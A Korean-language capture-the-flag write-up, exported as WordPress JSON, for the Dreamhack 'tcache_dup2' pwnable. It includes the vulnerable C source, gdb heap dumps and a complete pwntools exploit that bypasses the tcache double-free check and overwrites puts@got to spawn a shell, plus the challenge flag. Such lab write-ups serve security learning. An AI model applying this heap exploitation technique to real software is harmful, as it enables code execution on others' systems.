{"id":1518,"date":"2024-02-16T02:48:02","date_gmt":"2024-02-15T17:48:02","guid":{"rendered":"https:\/\/h4ck.kr\/?p=1518"},"modified":"2025-05-07T16:29:43","modified_gmt":"2025-05-07T07:29:43","slug":"tcache_dup2","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=1518","title":{"rendered":"[dreamhack] tcache_dup2"},"content":{"rendered":"\n

Description<\/h2>\n\n\n\n

\uc774 \ubb38\uc81c\ub294 \uc11c\ubc84\uc5d0\uc11c \uc791\ub3d9\ud558\uace0 \uc788\ub294 \uc11c\ube44\uc2a4(tcache_dup2)\uc758 \ubc14\uc774\ub108\ub9ac\uc640 \uc18c\uc2a4 \ucf54\ub4dc\uac00 \uc8fc\uc5b4\uc9d1\ub2c8\ub2e4.
\ucde8\uc57d\uc810\uc744 \uc775\uc2a4\ud50c\ub85c\uc787\ud574 \uc178\uc744 \ud68d\ub4dd\ud55c \ud6c4, “flag” \ud30c\uc77c\uc744 \uc77d\uc73c\uc138\uc694.
“flag” \ud30c\uc77c\uc758 \ub0b4\uc6a9\uc744 \uc6cc\uac8c\uc784 \uc0ac\uc774\ud2b8\uc5d0 \uc778\uc99d\ud558\uba74 \uc810\uc218\ub97c \ud68d\ub4dd\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.
\ud50c\ub798\uadf8\uc758 \ud615\uc2dd\uc740 DH{…} \uc785\ub2c8\ub2e4.<\/p>\n\n\n\n

Environment<\/h2>\n\n\n\n
\n
\n
Ubuntu 19.10\nArch:     amd64-64-little\nRELRO:    Partial RELRO\nStack:    No canary found\nNX:       NX enabled\nPIE:      No PIE (0x400000)<\/pre>\n<\/div>\n<\/div>\n\n\n\n
\ub514\ubc84\uae45 \uc2e4\uc2b5\uc744 \uc704\ud574 \ub85c\uceec \ud658\uacbd\uc5d0\uc11c\ub294 ubuntu 19.10 \ud658\uacbd\uc5d0\uc11c \ud14c\uc2a4\ud2b8\ud588\ub2e4.
(libc 2.30-0ubuntu2.2)<\/p>\n\n\n\n
checksec<\/h2>\n\n\n\n
\n
\n
seo@ubuntu:~\/Documents\/tcache_dup2$ checksec .\/tcache_dup2\n[*] '\/home\/seo\/Documents\/tcache_dup2\/tcache_dup2'\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    Canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x400000)<\/pre>\n<\/div>\n<\/div>\n\n\n\n
Source Code<\/h2>\n\n\n\n
tcache_dup2.c<\/h4>\n\n\n\n
\n
\n
#include <stdio.h>\n#include <stdlib.h>\n#include <signal.h>\n#include <unistd.h>\n\nchar *ptr[7];\n\nvoid initialize() {\n    setvbuf(stdin, NULL, _IONBF, 0);\n    setvbuf(stdout, NULL, _IONBF, 0);\n}\n\nvoid create_heap(int idx) {\n    size_t size;\n\n    if (idx >= 7)\n        exit(0);\n\n    printf(\"Size: \");\n    scanf(\"%ld\", &size);\n\n    ptr[idx] = malloc(size);\n\n    if (!ptr[idx])\n        exit(0);\n\n    printf(\"Data: \");\n    read(0, ptr[idx], size-1);\n}\n\nvoid modify_heap() {\n    size_t size, idx;\n\n    printf(\"idx: \");\n    scanf(\"%ld\", &idx);\n\n    if (idx >= 7)\n        exit(0);\n\n    printf(\"Size: \");\n    scanf(\"%ld\", &size);\n\n    if (size > 0x10)\n        exit(0);\n\n    printf(\"Data: \");\n    read(0, ptr[idx], size);\n}\n\nvoid delete_heap() {\n    size_t idx;\n\n    printf(\"idx: \");\n    scanf(\"%ld\", &idx);\n    if (idx >= 7)\n        exit(0);\n\n    if (!ptr[idx])\n        exit(0);\n\n    free(ptr[idx]);\n}\n\nvoid get_shell() {\n    system(\"\/bin\/sh\");\n}\nint main() {\n    int idx;\n    int i = 0;\n\n    initialize();\n\n    while (1) {\n        printf(\"1. Create heap\\n\");\n        printf(\"2. Modify heap\\n\");\n        printf(\"3. Delete heap\\n\");\n        printf(\"> \");\n\n        scanf(\"%d\", &idx);\n\n        switch (idx) {\n            case 1:\n                create_heap(i);\n                i++;\n                break;\n            case 2:\n                modify_heap();\n                break;\n            case 3:\n                delete_heap();\n                break;\n            default:\n                break;\n        }\n    }\n}<\/pre>\n<\/div>\n<\/div>\n\n\n\n
1) create_heap<\/strong><\/p>\n\n\n\n
\uc6d0\ud558\ub294 \ud06c\uae30\uc758 \uccad\ud06c\ub97c \ud560\ub2f9\ud560 \uc218 \uc788\ub2e4.
main_arena\uc5d0\uc11c heap \uad00\ub9ac\uac00 \ub418\uc9c0 \uc54a\uc73c\uba70, tcache\ub85c \ud560\ub2f9\ud574\uc57c\ub41c\ub2e4.<\/p>\n\n\n\n
2) modify_heap<\/strong><\/p>\n\n\n\n
DFB \ucde8\uc57d\uc810\uc744 \uc0ac\uc6a9\ud558\ub824\uba74, modify_heap\uc744 \ud1b5\ud574 \uc774\uc804 Tcache Poisoning \ubb38\uc81c\uc640 \ub9c8\ucc2c\uac00\uc9c0\ub85c e\u2192key \uac12\uc744 \ubcc0\uc870\ud558\uae30 \uc704\ud574 \uc0ac\uc6a9\ud558\uba74 \ub420 \uac83\uc774\ub2e4.<\/p>\n\n\n\n
3) delete_heap<\/strong><\/p>\n\n\n\n
free(ptr[idx]);<\/code>\ub97c \ud1b5\ud574 \uccad\ud06c\ub97c \ud574\uc81c\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
Solution<\/h2>\n\n\n\n
\uba3c\uc800, tcache\ub85c 9\ubc14\uc774\ud2b8 \uba54\ubaa8\ub9ac\ub97c \ud560\ub2f9\ud558\uace0 free\ub97c \ud558\uba74,<\/p>\n\n\n\n
\n
\n
from pwn import *\n#context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/tcache_dup2\")\n\ndef create(size, data):\n    p.sendlineafter(\"> \", \"1\")\n    p.sendlineafter(\"Size: \", str(size))\n    p.sendafter(\"Data: \", data)\n\ndef modify(idx, size, data):\n    p.sendlineafter(\"> \", \"2\")\n    p.sendlineafter(\"idx: \", str(idx))\n    p.sendlineafter(\"Size: \", str(size))\n    p.sendafter(\"Data: \", data)\n\ndef delete(idx):\n    p.sendlineafter(\"> \", \"3\")\n    p.sendlineafter(\"idx: \", str(idx))\n\n\n# malloc 9bytes and filled with AAAA...\ncreate(9, \"A\"*8)\ndelete(0)\npause()<\/pre>\n<\/div>\n<\/div>\n\n\n\n
\n
\n
gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk\n0x405000            0x0                 0x290                Used                None              None\n0x405290            0x0                 0x20                 Freed                0x0              None\ngdb-peda$ heapinfoall\n\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x4052b0 (size : 0x20d50)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](1): 0x4052a0\ngdb-peda$ p *(tcache_entry *)0x4052a0\n$1 = {\n  next = 0x0,\n  key = 0x405010\n}<\/pre>\n<\/div>\n<\/div>\n\n\n\n
\uadf8\ub7ec\uba74 0x405010\uc774 e\u2192key \uac12\uc774 \ub41c\ub2e4.<\/p>\n\n\n\n
DFB \ucde8\uc57d\uc810\uc744 \uc704\ud574 B\ub97c 8\ubc14\uc774\ud2b8 \ub354\ubbf8\ub85c \ucc44\uc6b0\uace0 e\u2192key\ub97c \ubcc0\uc870\ud574\ubcf4\uc790.<\/p>\n\n\n\n
\n
\n
# Bypass DFB mitigation\nmodify(0, 9, \"B\"*8 + \"\\x00\")\npause()<\/pre>\n<\/div>\n<\/div>\n\n\n\n
\n
\n
gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk\n0x405000            0x0                 0x290                Used                None              None\n0x405290            0x0                 0x20                 Freed 0x4242424242424242              None\ngdb-peda$ heapinfoall\n\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x4052b0 (size : 0x20d50)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](1): 0x4052a0 --> 0x4242424242424242 (invaild memory)\ngdb-peda$ parseheap\naddr                prev                size                 status              fd                bk\n0x405000            0x0                 0x290                Used                None              None\n0x405290            0x0                 0x20                 Freed 0x4242424242424242              None\ngdb-peda$ p *(tcache_entry *)0x4052a0\n$2 = {\n  next = 0x4242424242424242,\n  key = 0x405000\n}<\/pre>\n<\/div>\n<\/div>\n\n\n\n
e\u2192key \uc911 \ud558\uc704 1\ubc14\uc774\ud2b8\uac00 “\\x00″\uc73c\ub85c \ub36e\uc5b4\uc368\uc9c4 \uac83\uc744 \uc54c \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
\uadf8\ub9ac\uace0 \ud55c\ubc88\ub354 free\ub97c \ud574\ubcf4\uba74,<\/p>\n\n\n\n
\n
\n
delete(0)\npause()<\/pre>\n<\/div>\n<\/div>\n\n\n\n
\n
\n
gdb-peda$ heapinfoall\n\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x4052b0 (size : 0x20d50)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](2): 0x4052a0 --> 0x4052a0 (overlap chunk with 0x405290(freed) )<\/pre>\n<\/div>\n<\/div>\n\n\n\n
DFB mitigation\uc774 \uc6b0\ud68c\ub418\uc5b4,
\uccad\ud06c\ub294 \uc911\ucca9\uc0c1\ud0dc<\/strong>\uac00 \ub41c \uac83\uc744 \ud655\uc778\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
\uc774\uc81c \uc784\uc758\uc758 \uc8fc\uc18c\uc5d0 \uac12\uc744 \uc4f8 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
tcache\uc5d0 \uc0bd\uc785\ud560 \uc8fc\uc18c\ub97c \uc785\ub825\ud574\uc11c fd\ub97c \uc218\uc815\ud574\uc11c \ud560\ub2f9\ud55c\ub2e4.
\uc774\ub97c \ud1b5\ud574 \ud2b9\uc815 \uc601\uc5ed\uc5d0 heap\uc744 \ud560\ub2f9\ud558\uc5ec \ubcc0\uc870\uac00 \uac00\ub2a5\ud558\uac8c \ub418\ub294\ub370,
\uc5ec\uae30\uc11c\ub294 \uc258\uc744 \ud68d\ub4dd\ud558\uae30 \uc704\ud574 puts@got \uc8fc\uc18c\uc5d0 get_shell \uc8fc\uc18c\ub85c \ub36e\uc5b4\uc37c\ub2e4.<\/p>\n\n\n\n
\n
\n
# Overwrite get_shell to puts@got \ne = ELF(\".\/tcache_dup2\")\nputs_got = e.got['puts']\nget_shell = e.symbols['get_shell']\nmodify(0, 9, p64(puts_got))\n#pause()\ncreate(9, 'C'*8)\ncreate(9, p64(get_shell))\n\np.interactive()<\/pre>\n<\/div>\n<\/div>\n\n\n\n
\n
\n
gdb-peda$ p *(tcache_entry *)0x4052a0\n$1 = {\n  next = 0x404020 <puts@got.plt>,\n  key = 0x405010\n}\ngdb-peda$ p *(struct malloc_chunk *)0x405290\n$2 = {\n  mchunk_prev_size = 0x0,\n  mchunk_size = 0x21,\n  fd = 0x404020 <puts@got.plt>,\n  bk = 0x405010,\n  fd_nextsize = 0x0,\n  bk_nextsize = 0x20d51\n}<\/pre>\n<\/div>\n<\/div>\n\n\n\n
solve.py<\/h2>\n\n\n\n
\n
\n
from pwn import *\n#context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\n#p = process(\".\/tcache_dup2\")\np = remote(\"host3.dreamhack.games\", 14912)\n\ndef create(size, data):\n    p.sendlineafter(\"> \", \"1\")\n    p.sendlineafter(\"Size: \", str(size))\n    p.sendafter(\"Data: \", data)\n\ndef modify(idx, size, data):\n    p.sendlineafter(\"> \", \"2\")\n    p.sendlineafter(\"idx: \", str(idx))\n    p.sendlineafter(\"Size: \", str(size))\n    p.sendafter(\"Data: \", data)\n\ndef delete(idx):\n    p.sendlineafter(\"> \", \"3\")\n    p.sendlineafter(\"idx: \", str(idx))\n\n\n# malloc 9bytes and filled with AAAA...\ncreate(9, \"A\"*8)\ndelete(0)\n#pause()\n\n# Bypass DFB mitigation and free!\nmodify(0, 9, \"B\"*8 + \"\\x00\")\ndelete(0)\n# pause()\n\n# Overwrite get_shell to puts@got \ne = ELF(\".\/tcache_dup2\")\nputs_got = e.got['puts']\nget_shell = e.symbols['get_shell']\nmodify(0, 9, p64(puts_got))\ncreate(9, 'C'*8)\ncreate(9, p64(get_shell))\n\np.interactive()<\/pre>\n<\/div>\n<\/div>\n\n\n\n
Result<\/h2>\n\n\n\n
\n
\n
seo@ubuntu:~\/Documents\/tcache_dup2$ python3 solve.py\n[+] Opening connection to host3.dreamhack.games on port 14912: Done\n[*] '\/home\/seo\/Documents\/tcache_dup2\/tcache_dup2'\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    Canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x400000)\n[*] Switching to interactive mode\n$ ls\nflag\ntcache_dup2\n$ cat flag\nDH{025244482b3e8a14a2f2f1d984a753fa71a275918d61f6c2e3ae0980e2cb2a96}<\/pre>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"
Description \uc774 \ubb38\uc81c\ub294 \uc11c\ubc84\uc5d0\uc11c \uc791\ub3d9\ud558\uace0 \uc788\ub294 \uc11c\ube44\uc2a4(tcache_dup2)\uc758 \ubc14\uc774\ub108\ub9ac\uc640 \uc18c\uc2a4 \ucf54\ub4dc\uac00 \uc8fc\uc5b4\uc9d1\ub2c8\ub2e4.\ucde8\uc57d\uc810\uc744 \uc775\uc2a4\ud50c\ub85c\uc787\ud574 \uc178\uc744 \ud68d\ub4dd\ud55c \ud6c4, “flag” \ud30c\uc77c\uc744 \uc77d\uc73c\uc138\uc694.“flag” \ud30c\uc77c\uc758 \ub0b4\uc6a9\uc744 \uc6cc\uac8c\uc784 \uc0ac\uc774\ud2b8\uc5d0 \uc778\uc99d\ud558\uba74 \uc810\uc218\ub97c \ud68d\ub4dd\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.\ud50c\ub798\uadf8\uc758 \ud615\uc2dd\uc740 DH{…} \uc785\ub2c8\ub2e4. Environment \ub514\ubc84\uae45 \uc2e4\uc2b5\uc744 \uc704\ud574 \ub85c\uceec \ud658\uacbd\uc5d0\uc11c\ub294 ubuntu 19.10 \ud658\uacbd\uc5d0\uc11c \ud14c\uc2a4\ud2b8\ud588\ub2e4.(libc 2.30-0ubuntu2.2) checksec Source Code tcache_dup2.c 1) create_heap \uc6d0\ud558\ub294 \ud06c\uae30\uc758 \uccad\ud06c\ub97c \ud560\ub2f9\ud560 \uc218 \uc788\ub2e4.main_arena\uc5d0\uc11c heap \uad00\ub9ac\uac00… \ub354 \ubcf4\uae30 »[dreamhack] tcache_dup2<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[6],"tags":[25],"class_list":["post-1518","post","type-post","status-publish","format-standard","hentry","category-dreamhack-io","tag-pwnable"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/1518","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1518"}],"version-history":[{"count":4,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/1518\/revisions"}],"predecessor-version":[{"id":3453,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/1518\/revisions\/3453"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1518"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1518"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1518"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}